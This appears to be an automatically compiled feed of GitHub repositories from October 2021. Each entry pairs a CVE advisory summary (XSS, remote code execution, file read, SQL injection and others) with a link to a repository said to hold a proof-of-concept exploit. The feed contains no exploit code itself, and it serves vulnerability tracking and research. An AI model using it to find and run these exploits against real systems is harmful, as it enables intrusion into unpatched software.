**PoC for exploiting CVE-2020-21124 : UReport 2.2.9 allows attackers to execute arbitrary code due to a lack of access control to the designer page.** : [AIPOCAI/CVE-2020-21124](https://github.com/AIPOCAI/CVE-2020-21124) create time: 2021-10-05T11:08:40Z

**PoC for exploiting CVE-2020-21125 : An arbitrary file creation vulnerability in UReport 2.2.9 allows attackers to execute arbitrary code.** : [AIPOCAI/CVE-2020-21125](https://github.com/AIPOCAI/CVE-2020-21125) create time: 2021-10-05T11:08:25Z

**PoC for exploiting CVE-2021-27045 : A maliciously crafted PDF file in Autodesk Navisworks 2019, 2020, 2021, 2022 can be forced to read beyond allocated boundaries when parsing the PDF file. This vulnerability can be exploited to execute arbitrary code.** : [AIPOCAI/CVE-2021-27045](https://github.com/AIPOCAI/CVE-2021-27045) create time: 2021-10-05T11:08:10Z

**PoC for exploiting CVE-2021-27046 : A Memory Corruption vulnerability for PDF files in Autodesk Navisworks 2019, 2020, 2021, 2022 may lead to code execution through maliciously crafted DLL files.** : [AIPOCAI/CVE-2021-27046](https://github.com/AIPOCAI/CVE-2021-27046) create time: 2021-10-05T11:08:06Z

**PoC for exploiting CVE-2020-23659 : WebPort-v1.19.17121 is affected by Cross Site Scripting (XSS) on the "connections" feature.** : [AIPOCAI/CVE-2020-23659](https://github.com/AIPOCAI/CVE-2020-23659) create time: 2021-10-05T11:07:02Z

**PoC for exploiting CVE-2020-21468 : ** DISPUTED ** A segmentation fault in the redis-server component of Redis 5.0.7 leads to a denial of service (DOS). NOTE: the vendor cannot reproduce this issue in a released version, such as 5.0.7.** : [AIPOCAI/CVE-2020-21468](https://github.com/AIPOCAI/CVE-2020-21468) create time: 2021-10-05T11:06:11Z

**PoC for exploiting CVE-2021-27044 : A Out-Of-Bounds Read/Write Vulnerability in Autodesk FBX Review version 1.4.0 may lead to remote code execution through maliciously crafted DLL files or information disclosure.** : [AIPOCAI/CVE-2021-27044](https://github.com/AIPOCAI/CVE-2021-27044) create time: 2021-10-05T11:16:19Z

**PoC for exploiting CVE-2021-39209 : GLPI is a free Asset and IT management software package. In versions prior to 9.5.6, a user who is logged in to GLPI can bypass Cross-Site Request Forgery (CSRF) protection in many places. This could allow a malicious actor to perform many actions on GLPI. This issue is fixed in version 9.5.6. There are no workarounds aside from upgrading.** : [AIPOCAI/CVE-2021-39209](https://github.com/AIPOCAI/CVE-2021-39209) create time: 2021-10-05T11:16:15Z

**PoC for exploiting CVE-2021-38156 : In Nagios XI before 5.8.6, XSS exists in the dashboard page (/dashboards/#) when administrative users attempt to edit a dashboard.** : [AIPOCAI/CVE-2021-38156](https://github.com/AIPOCAI/CVE-2021-38156) create time: 2021-10-05T11:16:11Z

**PoC for exploiting CVE-2021-27340 : OpenSIS Community Edition version <= 7.6 is affected by a reflected XSS vulnerability in EmailCheck.php via the "opt" parameter.** : [AIPOCAI/CVE-2021-27340](https://github.com/AIPOCAI/CVE-2021-27340) create time: 2021-10-05T11:16:07Z

**PoC for exploiting CVE-2021-27341 : OpenSIS Community Edition version <= 7.6 is affected by a local file inclusion vulnerability in DownloadWindow.php via the "filename" parameter.** : [AIPOCAI/CVE-2021-27341](https://github.com/AIPOCAI/CVE-2021-27341) create time: 2021-10-05T11:16:03Z

**PoC for exploiting CVE-2021-3797 : hestiacp is vulnerable to Use of Wrong Operator in String Comparison** : [AIPOCAI/CVE-2021-3797](https://github.com/AIPOCAI/CVE-2021-3797) create time: 2021-10-05T11:15:59Z

**PoC for exploiting CVE-2021-40066 : The access controls on the Mobility read-only API improperly validate user access permissions. Attackers with both network access to the API and valid credentials can read data from it; regardless of access control group membership settings. This vulnerability is fixed in Mobility v11.76 and Mobility v12.14.** : [AIPOCAI/CVE-2021-40066](https://github.com/AIPOCAI/CVE-2021-40066) create time: 2021-10-05T11:15:55Z

**PoC for exploiting CVE-2021-40067 : The access controls on the Mobility read-write API improperly validate user access permissions; this API is disabled by default. If the API is manually enabled, attackers with both network access to the API and valid credentials can read and write data to it; regardless of access control group membership settings. This vulnerability is fixed in Mobility v12.14.** : [AIPOCAI/CVE-2021-40067](https://github.com/AIPOCAI/CVE-2021-40067) create time: 2021-10-05T11:15:51Z

**PoC for exploiting CVE-2021-40157 : A user may be tricked into opening a malicious FBX file which may exploit an Untrusted Pointer Dereference vulnerability in FBX’s Review version 1.5.0 and prior causing it to run arbitrary code on the system.** : [AIPOCAI/CVE-2021-40157](https://github.com/AIPOCAI/CVE-2021-40157) create time: 2021-10-05T11:15:47Z

**PoC for exploiting CVE-2021-34576 : In Kaden PICOFLUX Air in all known versions an information exposure through observable discrepancy exists. This may give sensitive information (water consumption without distinct values) to third parties.** : [AIPOCAI/CVE-2021-34576](https://github.com/AIPOCAI/CVE-2021-34576) create time: 2021-10-05T11:15:43Z

**PoC for exploiting CVE-2021-29752 : IBM Db2 11.2 and 11.5 contains an information disclosure vulnerability, exposing remote storage credentials to privileged users under specific conditions. IBM X-Fporce ID: 201780.** : [AIPOCAI/CVE-2021-29752](https://github.com/AIPOCAI/CVE-2021-29752) create time: 2021-10-05T11:15:38Z

**PoC for exploiting CVE-2021-29842 : IBM WebSphere Application Server 7.0, 8.0, 8.5, 9.0 and Liberty 17.0.0.3 through 21.0.0.9 could allow a remote user to enumerate usernames due to a difference of responses from valid and invalid login attempts. IBM X-Force ID: 205202.** : [AIPOCAI/CVE-2021-29842](https://github.com/AIPOCAI/CVE-2021-29842) create time: 2021-10-05T11:15:34Z

**PoC for exploiting CVE-2021-3805 : object-path is vulnerable to Improperly Controlled Modification of Object Prototype Attributes ('Prototype Pollution')** : [AIPOCAI/CVE-2021-3805](https://github.com/AIPOCAI/CVE-2021-3805) create time: 2021-10-05T11:15:27Z

**PoC for exploiting CVE-2021-39189 : Pimcore is an open source data & experience management platform. In versions prior to 10.1.3, it is possible to enumerate usernames via the forgot password functionality. This issue is fixed in version 10.1.3. As a workaround, one may apply the available patch manually.** : [AIPOCAI/CVE-2021-39189](https://github.com/AIPOCAI/CVE-2021-39189) create time: 2021-10-05T11:15:18Z

**PoC for exploiting CVE-2021-41061 : In RIOT-OS 2021.01, nonce reuse in 802.15.4 encryption in the ieee820154_security component allows attackers to break encryption by triggering reboots.** : [AIPOCAI/CVE-2021-41061](https://github.com/AIPOCAI/CVE-2021-41061) create time: 2021-10-05T11:14:33Z

**PoC for exploiting CVE-2021-40670 : SQL Injection vulnerability exists in Wuzhi CMS 4.1.0 via the keywords iparameter under the /coreframe/app/order/admin/card.php file.** : [AIPOCAI/CVE-2021-40670](https://github.com/AIPOCAI/CVE-2021-40670) create time: 2021-10-05T11:14:28Z

**PoC for exploiting CVE-2021-40845 : The web part of Zenitel AlphaCom XE Audio Server through 11.2.3.10, called AlphaWeb XE, does not restrict file upload in the Custom Scripts section at php/index.php. Neither the content nor extension of the uploaded files is checked, allowing execution of PHP code under the /cmd directory.** : [AIPOCAI/CVE-2021-40845](https://github.com/AIPOCAI/CVE-2021-40845) create time: 2021-10-05T11:14:24Z

**PoC for exploiting CVE-2021-38877 : IBM Jazz for Service Management 1.1.3.10 is vulnerable to stored cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. IBM X-Force ID: 208405.** : [AIPOCAI/CVE-2021-38877](https://github.com/AIPOCAI/CVE-2021-38877) create time: 2021-10-05T11:14:20Z

**PoC for exploiting CVE-2021-29905 : IBM Jazz for Service Management 1.1.3.10 and IBM Tivoli Netcool/OMNIbus_GUI is vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. IBM X-Force ID: 207616.** : [AIPOCAI/CVE-2021-29905](https://github.com/AIPOCAI/CVE-2021-29905) create time: 2021-10-05T11:14:17Z

**PoC for exploiting CVE-2021-29904 : IBM Jazz for Service Management 1.1.3.10 and IBM Tivoli Netcool/OMNIbus_GUI displays user credentials in plain clear text which can be read by a local user. IBM X-Force ID: 207610.** : [AIPOCAI/CVE-2021-29904](https://github.com/AIPOCAI/CVE-2021-29904) create time: 2021-10-05T11:14:12Z

**PoC for exploiting CVE-2021-29833 : IBM Jazz for Service Management 1.1.3.10 and IBM Tivoli Netcool/OMNIbus_GUI is vulnerable to stored cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. IBM X-Force ID: 204825.** : [AIPOCAI/CVE-2021-29833](https://github.com/AIPOCAI/CVE-2021-29833) create time: 2021-10-05T11:14:08Z

**PoC for exploiting CVE-2021-29832 : IBM Jazz for Service Management 1.1.3.10 and IBM Tivoli Netcool/OMNIbus_GUI is vulnerable to stored cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. IBM X-Force ID: 204824.** : [AIPOCAI/CVE-2021-29832](https://github.com/AIPOCAI/CVE-2021-29832) create time: 2021-10-05T11:13:58Z

**PoC for exploiting CVE-2021-29816 : IBM Jazz for Service Management 1.1.3.10 and IBM Tivoli Netcool/OMNIbus_GUI is vulnerable to cross-site request forgery which could allow an attacker to execute malicious and unauthorized actions transmitted from a user that the website trusts. IBM X-Force ID: 204341.** : [AIPOCAI/CVE-2021-29816](https://github.com/AIPOCAI/CVE-2021-29816) create time: 2021-10-05T11:13:54Z

**PoC for exploiting CVE-2021-29815 : IBM Jazz for Service Management 1.1.3.10 and IBM Tivoli Netcool/OMNIbus_GUI is vulnerable to stored cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. IBM X-Force ID: 204340.** : [AIPOCAI/CVE-2021-29815](https://github.com/AIPOCAI/CVE-2021-29815) create time: 2021-10-05T11:13:50Z

**PoC for exploiting CVE-2021-29814 : IBM Jazz for Service Management 1.1.3.10 and IBM Tivoli Netcool/OMNIbus_GUI is vulnerable to stored cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. IBM X-Force ID: 204334.** : [AIPOCAI/CVE-2021-29814](https://github.com/AIPOCAI/CVE-2021-29814) create time: 2021-10-05T11:13:45Z

**PoC for exploiting CVE-2021-29813 : IBM Jazz for Service Management 1.1.3.10 and IBM Tivoli Netcool/OMNIbus_GUI is vulnerable to stored cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. IBM X-Force ID: 204331.** : [AIPOCAI/CVE-2021-29813](https://github.com/AIPOCAI/CVE-2021-29813) create time: 2021-10-05T11:13:41Z

**PoC for exploiting CVE-2021-29812 : IBM Jazz for Service Management 1.1.3.10 and IBM Tivoli Netcool/OMNIbus_GUI is vulnerable to stored cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. IBM X-Force ID: 204330.** : [AIPOCAI/CVE-2021-29812](https://github.com/AIPOCAI/CVE-2021-29812) create time: 2021-10-05T11:13:37Z

**PoC for exploiting CVE-2021-29810 : IBM Jazz for Service Management 1.1.3.10 and IBM Tivoli Netcool/OMNIbus_GUI is vulnerable to stored cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. IBM X-Force ID: 204279.** : [AIPOCAI/CVE-2021-29810](https://github.com/AIPOCAI/CVE-2021-29810) create time: 2021-10-05T11:13:33Z

**PoC for exploiting CVE-2021-38176 : Due to improper input sanitization, an authenticated user with certain specific privileges can remotely call NZDT function modules listed in Solution Section to execute manipulated query to gain access to Backend Database. On successful exploitation the threat actor could completely compromise confidentiality, integrity, and availability of the system.** : [AIPOCAI/CVE-2021-38176](https://github.com/AIPOCAI/CVE-2021-38176) create time: 2021-10-05T11:13:24Z

**PoC for exploiting CVE-2021-21798 : An exploitable return of stack variable address vulnerability exists in the JavaScript implementation of Nitro Pro PDF. A specially crafted document can cause a stack variable to go out of scope, resulting in the application dereferencing a stale pointer. This can lead to code execution under the context of the application. An attacker can convince a user to open a document to trigger the vulnerability.** : [AIPOCAI/CVE-2021-21798](https://github.com/AIPOCAI/CVE-2021-21798) create time: 2021-10-05T11:13:17Z

**PoC for exploiting CVE-2018-16871 : A flaw was found in the Linux kernel's NFS implementation, all versions 3.x and all versions 4.x up to 4.20. An attacker, who is able to mount an exported NFS filesystem, is able to trigger a null pointer dereference by using an invalid NFS sequence. This can panic the machine and deny access to the NFS server. Any outstanding disk writes to the NFS server will be lost.** : [AlAIAL90/CVE-2018-16871](https://github.com/AlAIAL90/CVE-2018-16871) create time: 2021-10-05T10:20:48Z

**PoC for exploiting CVE-2019-0205 : In Apache Thrift all versions up to and including 0.12.0, a server or client may run into an endless loop when feed with specific input data. Because the issue had already been partially fixed in version 0.11.0, depending on the installed version it affects only certain language bindings.** : [AlAIAL90/CVE-2019-0205](https://github.com/AlAIAL90/CVE-2019-0205) create time: 2021-10-05T10:19:24Z

**PoC for exploiting CVE-2020-21913 : International Components for Unicode (ICU-20850) v66.1 was discovered to contain a use after free bug in the pkg_createWithAssemblyCode function in the file tools/pkgdata/pkgdata.cpp.** : [AlAIAL90/CVE-2020-21913](https://github.com/AlAIAL90/CVE-2020-21913) create time: 2021-10-05T10:21:31Z

**PoC for exploiting CVE-2020-19144 : Buffer Overflow in LibTiff v4.0.10 allows attackers to cause a denial of service via the 'in _TIFFmemcpy' funtion in the component 'tif_unix.c'.** : [AlAIAL90/CVE-2020-19144](https://github.com/AlAIAL90/CVE-2020-19144) create time: 2021-10-05T10:20:33Z

**PoC for exploiting CVE-2020-19143 : Buffer Overflow in LibTiff v4.0.10 allows attackers to cause a denial of service via the "TIFFVGetField" funtion in the component 'libtiff/tif_dir.c'.** : [AlAIAL90/CVE-2020-19143](https://github.com/AlAIAL90/CVE-2020-19143) create time: 2021-10-05T10:20:29Z

**PoC for exploiting CVE-2021-35202 : NETSCOUT Systems nGeniusONE 6.3.0 build 1196 allows Authorization Bypass (to access an endpoint) in FDSQueryService.** : [AlAIAL90/CVE-2021-35202](https://github.com/AlAIAL90/CVE-2021-35202) create time: 2021-10-05T10:21:43Z

**PoC for exploiting CVE-2021-35203 : NETSCOUT Systems nGeniusONE 6.3.0 build 1196 allows Arbitrary File Read operations via the FDSQueryService endpoint.** : [AlAIAL90/CVE-2021-35203](https://github.com/AlAIAL90/CVE-2021-35203) create time: 2021-10-05T10:21:39Z

**PoC for exploiting CVE-2021-3626 : The Windows version of Multipass before 1.7.0 allowed any local process to connect to the localhost TCP control socket to perform mounts from the operating system to a guest, allowing for privilege escalation.** : [AlAIAL90/CVE-2021-3626](https://github.com/AlAIAL90/CVE-2021-3626) create time: 2021-10-05T10:21:35Z

**PoC for exploiting CVE-2021-3747 : The MacOS version of Multipass, version 1.7.0, fixed in 1.7.2, accidentally installed the application directory with incorrect owner.** : [AlAIAL90/CVE-2021-3747](https://github.com/AlAIAL90/CVE-2021-3747) create time: 2021-10-05T10:21:27Z

**PoC for exploiting CVE-2021-34352 : A command injection vulnerability has been reported to affect QNAP device running QVR. If exploited, this vulnerability could allow remote attackers to run arbitrary commands. We have already fixed this vulnerability in the following versions of QVR: QVR 5.1.5 build 20210902 and later** : [AlAIAL90/CVE-2021-34352](https://github.com/AlAIAL90/CVE-2021-34352) create time: 2021-10-05T10:21:24Z

**PoC for exploiting CVE-2021-41082 : Discourse is a platform for community discussion. In affected versions any private message that includes a group had its title and participating user exposed to users that do not have access to the private messages. However, access control for the private messages was not compromised as users were not able to view the posts in the leaked private message despite seeing it in their inbox. The problematic commit was reverted around 32 minutes after it was made. Users are encouraged to upgrade to the latest commit if they are running Discourse against the `tests-passed` branch.** : [AlAIAL90/CVE-2021-41082](https://github.com/AlAIAL90/CVE-2021-41082) create time: 2021-10-05T10:21:20Z

**PoC for exploiting CVE-2021-23054 : On version 16.x before 16.1.0, 15.1.x before 15.1.4, 14.1.x before 14.1.4.4, and all versions of 13.1.x, 12.1.x, and 11.6.x, a reflected cross-site scripting (XSS) vulnerability exists in the resource information page for authenticated users when a full webtop is configured on the BIG-IP APM system. Note: Software versions which have reached End of Technical Support (EoTS) are not evaluated.** : [AlAIAL90/CVE-2021-23054](https://github.com/AlAIAL90/CVE-2021-23054) create time: 2021-10-05T10:21:16Z

**PoC for exploiting CVE-2021-38402 : Delta Electronic DOPSoft 2 (Version 2.00.07 and prior) lacks proper validation of user-supplied data when parsing specific project files. This could lead to a stack-based buffer overflow while trying to copy to a buffer during font string handling. An attacker could leverage this vulnerability to execute code in the context of the current process.** : [AlAIAL90/CVE-2021-38402](https://github.com/AlAIAL90/CVE-2021-38402) create time: 2021-10-05T10:21:12Z

**PoC for exploiting CVE-2021-38404 : Delta Electronic DOPSoft 2 (Version 2.00.07 and prior) lacks proper validation of user-supplied data when parsing specific project files. This could result in a heap-based buffer overflow. An attacker could leverage this vulnerability to execute code in the context of the current process.** : [AlAIAL90/CVE-2021-38404](https://github.com/AlAIAL90/CVE-2021-38404) create time: 2021-10-05T10:21:09Z

**PoC for exploiting CVE-2021-38406 : Delta Electronic DOPSoft 2 (Version 2.00.07 and prior) lacks proper validation of user-supplied data when parsing specific project files. This could result in multiple out-of-bounds write instances. An attacker could leverage this vulnerability to execute code in the context of the current process.** : [AlAIAL90/CVE-2021-38406](https://github.com/AlAIAL90/CVE-2021-38406) create time: 2021-10-05T10:21:05Z

**PoC for exploiting CVE-2021-1810 : A logic issue was addressed with improved state management. This issue is fixed in macOS Big Sur 11.3, Security Update 2021-002 Catalina. A malicious application may bypass Gatekeeper checks.** : [AlAIAL90/CVE-2021-1810](https://github.com/AlAIAL90/CVE-2021-1810) create time: 2021-10-05T10:21:00Z

**PoC for exploiting CVE-2021-41381 : Payara Micro Community 5.2021.6 and below allows Directory Traversal.** : [AlAIAL90/CVE-2021-41381](https://github.com/AlAIAL90/CVE-2021-41381) create time: 2021-10-05T10:20:56Z

**PoC for exploiting CVE-2021-39229 : Apprise is an open source library which allows you to send a notification to almost all of the most popular notification services available. In affected versions users who use Apprise granting them access to the IFTTT plugin (which just comes out of the box) are subject to a denial of service attack on an inefficient regular expression. The vulnerable regular expression is [here](https://github.com/caronc/apprise/blob/0007eade20934ddef0aba38b8f1aad980cfff253/apprise/plugins/NotifyIFTTT.py#L356-L359). The problem has been patched in release version 0.9.5.1. Users who are unable to upgrade are advised to remove `apprise/plugins/NotifyIFTTT.py` to eliminate the service.** : [AlAIAL90/CVE-2021-39229](https://github.com/AlAIAL90/CVE-2021-39229) create time: 2021-10-05T10:20:52Z

**PoC for exploiting CVE-2021-3634 : A flaw has been found in libssh in versions prior to 0.9.6. The SSH protocol keeps track of two shared secrets during the lifetime of the session. One of them is called secret_hash and the other session_id. Initially, both of them are the same, but after key re-exchange, previous session_id is kept and used as an input to new secret_hash. Historically, both of these buffers had shared length variable, which worked as long as these buffers were same. But the key re-exchange operation can also change the key exchange method, which can be based on hash of different size, eventually creating "secret_hash" of different size than the session_id has. This becomes an issue when the session_id memory is zeroed or when it is used again during second key re-exchange.** : [AlAIAL90/CVE-2021-3634](https://github.com/AlAIAL90/CVE-2021-3634) create time: 2021-10-05T10:20:44Z

**PoC for exploiting CVE-2021-40490 : A race condition was discovered in ext4_write_inline_data_end in fs/ext4/inline.c in the ext4 subsystem in the Linux kernel through 5.13.13.** : [AlAIAL90/CVE-2021-40490](https://github.com/AlAIAL90/CVE-2021-40490) create time: 2021-10-05T10:20:41Z

**PoC for exploiting CVE-2021-25737 : A security issue was discovered in Kubernetes where a user may be able to redirect pod traffic to private networks on a Node. Kubernetes already prevents creation of Endpoint IPs in the localhost or link-local range, but the same validation was not performed on EndpointSlice IPs.** : [AlAIAL90/CVE-2021-25737](https://github.com/AlAIAL90/CVE-2021-25737) create time: 2021-10-05T10:20:37Z

**PoC for exploiting CVE-2021-36134 : Out of bounds write vulnerability in the JPEG parsing code of Netop Vision Pro up to and including 9.7.2 allows an adjacent unauthenticated attacker to write to arbitrary memory potentially leading to a Denial of Service (DoS).** : [AlAIAL90/CVE-2021-36134](https://github.com/AlAIAL90/CVE-2021-36134) create time: 2021-10-05T10:20:25Z

**PoC for exploiting CVE-2021-39823 : Adobe svg-native-viewer 8182d14dfad5d1e10f53ed830328d7d9a3cfa96d and earlier versions are affected by a heap buffer overflow vulnerability due to insecure handling of a malicious .svg file, potentially resulting in arbitrary code execution in the context of the current user. User interaction is required to exploit this vulnerability.** : [AlAIAL90/CVE-2021-39823](https://github.com/AlAIAL90/CVE-2021-39823) create time: 2021-10-05T10:20:21Z

**PoC for exploiting CVE-2021-24643 : The WP Map Block WordPress plugin before 1.2.3 does not escape some attributes of the WP Map Block, which could allow users with a role as low as contributor to perform Stored Cross-Site Scripting attacks** : [AlAIAL90/CVE-2021-24643](https://github.com/AlAIAL90/CVE-2021-24643) create time: 2021-10-05T10:20:17Z

**PoC for exploiting CVE-2021-24634 : The Recipe Card Blocks by WPZOOM WordPress plugin before 2.8.3 does not properly sanitise or escape some of the properties of the Recipe Card Block (such as ingredientsLayout, iconSet, steps, ingredients, recipeTitle, or settings), which could allow users with a role as low as contributor to perform Stored Cross-Site Scripting attacks.** : [AlAIAL90/CVE-2021-24634](https://github.com/AlAIAL90/CVE-2021-24634) create time: 2021-10-05T10:20:13Z

**PoC for exploiting CVE-2021-24633 : The Countdown Block WordPress plugin before 1.1.2 does not have authorisation in the eb_write_block_css AJAX action, which allows any authenticated user, such as Subscriber, to modify post contents displayed to users.** : [AlAIAL90/CVE-2021-24633](https://github.com/AlAIAL90/CVE-2021-24633) create time: 2021-10-05T10:20:09Z

**PoC for exploiting CVE-2021-24632 : The Recipe Card Blocks by WPZOOM WordPress plugin before 2.8.1 does not escape the message parameter before outputting it back in the admin dashboard, leading to a Reflected Cross-Site Scripting issue** : [AlAIAL90/CVE-2021-24632](https://github.com/AlAIAL90/CVE-2021-24632) create time: 2021-10-05T10:20:04Z

**PoC for exploiting CVE-2021-24610 : The TranslatePress WordPress plugin before 2.0.9 does not implement a proper sanitisation on the translated strings. The 'trp_sanitize_string' function only removes script tag with a regex, still allowing other HTML tags and attributes to execute javascript, which could lead to authenticated Stored Cross-Site Scripting issues.** : [AlAIAL90/CVE-2021-24610](https://github.com/AlAIAL90/CVE-2021-24610) create time: 2021-10-05T10:19:59Z

**PoC for exploiting CVE-2021-24569 : The Cookie Notice & Compliance for GDPR / CCPA WordPress plugin before 2.1.2 does not escape the value of its Button Text setting when outputting it in an attribute in the frontend, allowing high privilege users such as admin to perform Cross-Site Scripting even when the unfiltered_html capability is disallowed.** : [AlAIAL90/CVE-2021-24569](https://github.com/AlAIAL90/CVE-2021-24569) create time: 2021-10-05T10:19:55Z

**PoC for exploiting CVE-2021-36878 : Cross-Site Request Forgery (CSRF) vulnerability in WordPress uListing plugin (versions <= 2.0.5) makes it possible for attackers to update settings.** : [AlAIAL90/CVE-2021-36878](https://github.com/AlAIAL90/CVE-2021-36878) create time: 2021-10-05T10:19:51Z

**PoC for exploiting CVE-2021-3546 : A flaw was found in vhost-user-gpu of QEMU in versions up to and including 6.0. An out-of-bounds write vulnerability can allow a malicious guest to crash the QEMU process on the host resulting in a denial of service or potentially execute arbitrary code on the host with the privileges of the QEMU process. The highest threat from this vulnerability is to data confidentiality and integrity as well as system availability.** : [AlAIAL90/CVE-2021-3546](https://github.com/AlAIAL90/CVE-2021-3546) create time: 2021-10-05T10:19:47Z

**PoC for exploiting CVE-2021-3545 : An information disclosure vulnerability was found in the virtio vhost-user GPU device (vhost-user-gpu) of QEMU in versions up to and including 6.0. The flaw exists in virgl_cmd_get_capset_info() in contrib/vhost-user-gpu/virgl.c and could occur due to the read of uninitialized memory. A malicious guest could exploit this issue to leak memory from the host.** : [AlAIAL90/CVE-2021-3545](https://github.com/AlAIAL90/CVE-2021-3545) create time: 2021-10-05T10:19:43Z

**PoC for exploiting CVE-2021-3544 : Several memory leaks were found in the virtio vhost-user GPU device (vhost-user-gpu) of QEMU in versions up to and including 6.0. They exist in contrib/vhost-user-gpu/vhost-user-gpu.c and contrib/vhost-user-gpu/virgl.c due to improper release of memory (i.e., free) after effective lifetime.** : [AlAIAL90/CVE-2021-3544](https://github.com/AlAIAL90/CVE-2021-3544) create time: 2021-10-05T10:19:40Z

**PoC for exploiting CVE-2021-35197 : In MediaWiki before 1.31.15, 1.32.x through 1.35.x before 1.35.3, and 1.36.x before 1.36.1, bots have certain unintended API access. When a bot account has a "sitewide block" applied, it is able to still "purge" pages through the MediaWiki Action API (which a "sitewide block" should have prevented).** : [AlAIAL90/CVE-2021-35197](https://github.com/AlAIAL90/CVE-2021-35197) create time: 2021-10-05T10:19:35Z

**PoC for exploiting CVE-2021-3682 : A flaw was found in the USB redirector device emulation of QEMU in versions prior to 6.1.0-rc2. It occurs when dropping packets during a bulk transfer from a SPICE client due to the packet queue being full. A malicious SPICE client could use this flaw to make QEMU call free() with faked heap chunk metadata, resulting in a crash of QEMU or potential code execution with the privileges of the QEMU process on the host.** : [AlAIAL90/CVE-2021-3682](https://github.com/AlAIAL90/CVE-2021-3682) create time: 2021-10-05T10:19:32Z

**Atlassian Confluence Server 7.5.1 Pre-Authorization Arbitrary File Read vulnerability** : [ColdFusionX/CVE-2021-26085](https://github.com/ColdFusionX/CVE-2021-26085) create time: 2021-10-05T08:20:25Z

**no description** : [hh-hunter/nacos-cve-2021-29441](https://github.com/hh-hunter/nacos-cve-2021-29441) create time: 2021-10-05T07:59:05Z

**The plugin does not sanitise the HTML allowed in the Bio of users, allowing them to use malicious JavaScript code, which will be executed when anyone visit a post in the frontend made by such user. As a result, user with a role as low as author could perform Cross-Site Scripting attacks against users, which could potentially lead to privilege escalation when an admin view the related post/s.** : [V35HR4J/CVE-2021-24545](https://github.com/V35HR4J/CVE-2021-24545) create time: 2021-10-05T06:28:05Z

**The plugin does not prevent HTML files from being uploaded via its form, allowing unauthenticated user to upload a malicious HTML file containing JavaScript for example, which will be triggered when someone access the file directly** : [V35HR4J/CVE-2021-24563](https://github.com/V35HR4J/CVE-2021-24563) create time: 2021-10-05T06:21:50Z

**no description** : [Opensitoo/cve-2020-0796](https://github.com/Opensitoo/cve-2020-0796) create time: 2021-10-04T22:16:37Z

**BIQS IT Biqs-drive v1.83** : [PinkDraconian/CVE-2021-39433](https://github.com/PinkDraconian/CVE-2021-39433) create time: 2021-10-04T19:02:35Z

**no description** : [artsking/linux-3.0.35_CVE-2020-15436_withPatch](https://github.com/artsking/linux-3.0.35_CVE-2020-15436_withPatch) create time: 2021-10-04T07:44:42Z

**no description** : [H0j3n/CVE-2020-23934](https://github.com/H0j3n/CVE-2020-23934) create time: 2020-09-14T08:16:23Z

**CVE-2018-15961 — ᴀᴅᴏʙᴇ ᴄᴏʟᴅғᴜsɪᴏɴ (ʀᴄᴇ)** : [oxctdev/CVE-2018-15961](https://github.com/oxctdev/CVE-2018-15961) create time: 2021-10-03T23:31:47Z

**CVE-2021-21972 – ᴠᴍᴡᴀʀᴇ ᴄʟɪᴇɴᴛ ᴜɴᴀᴜᴛʜᴏʀɪᴢᴇᴅ ᴄᴏᴅᴇ ɪɴᴊᴇᴄᴛɪᴏɴ (ʀᴄᴇ)** : [oxctdev/CVE-2021-21972](https://github.com/oxctdev/CVE-2021-21972) create time: 2021-10-03T23:03:11Z

**Exploit code for CVE-2007-2447 written in Python3.** : [xbufu/CVE-2007-2447](https://github.com/xbufu/CVE-2007-2447) create time: 2021-10-03T21:38:19Z

**Proof On Concept — Pulse Secure CVE-2021-22893** : [oxctdev/CVE-2021-22893](https://github.com/oxctdev/CVE-2021-22893) create time: 2021-10-03T21:46:58Z

**no description** : [H0j3n/CVE-2021-40444](https://github.com/H0j3n/CVE-2021-40444) create time: 2021-10-03T01:13:42Z

**Exploit for CVE-2019-17662 (ThinVNC 1.0b1)** : [whokilleddb/CVE-2019-17662](https://github.com/whokilleddb/CVE-2019-17662) create time: 2021-10-02T15:57:11Z

**This project is automate the reconnaissance process or process of information gathering about the target domain or company which host bug bounty program. You can run this whole Virtual Private Server but since i don't have any so i dig and found that GitHub will provide 2000 minute/month for running workflow in their virtual machine, they provide windows, mac and ubuntu as Linux distribution, for testing purpose of the development, so we integrate testing phase directly in development process, So i have create custom scripts and workflow file which run install all the necessary tools and run the appropriate scripts, the work is done by this workflow is subdomain enumeration, dns resolution, reverse-dns resolve, port-scanning of all the hosts,findig virtual hosts, fuzzing for content discovery, and run nuclei which is template based scanner by project discovery is to scan the host for any CVE and common vulnerabilities, you can add custom template and custom scripts, and finally Discord integration, so when some work is done it will send message to discord webhook url configure in it. For further details view Repository.** : [GDSC-IU/automate-with-actions](https://github.com/GDSC-IU/automate-with-actions) create time: 2021-10-02T14:04:22Z

**no description** : [puckiestyle/CVE-2021-3493](https://github.com/puckiestyle/CVE-2021-3493) create time: 2021-10-02T14:44:43Z

**no description** : [Ni7inSharma/CVE-2021-41511](https://github.com/Ni7inSharma/CVE-2021-41511) create time: 2021-10-02T10:44:59Z

**the metasploit script(POC/EXP) about CVE-2021-22005 VMware vCenter Server contains an arbitrary file upload vulnerability** : [TaroballzChen/CVE-2021-22005-metasploit](https://github.com/TaroballzChen/CVE-2021-22005-metasploit) create time: 2021-10-02T07:32:04Z

**POC for scanning ProxyShell(CVE-2021-34423,CVE-2021-34473,CVE-2021-31207)** : [mithridates1313/ProxyShell_POC](https://github.com/mithridates1313/ProxyShell_POC) create time: 2021-10-02T07:29:24Z

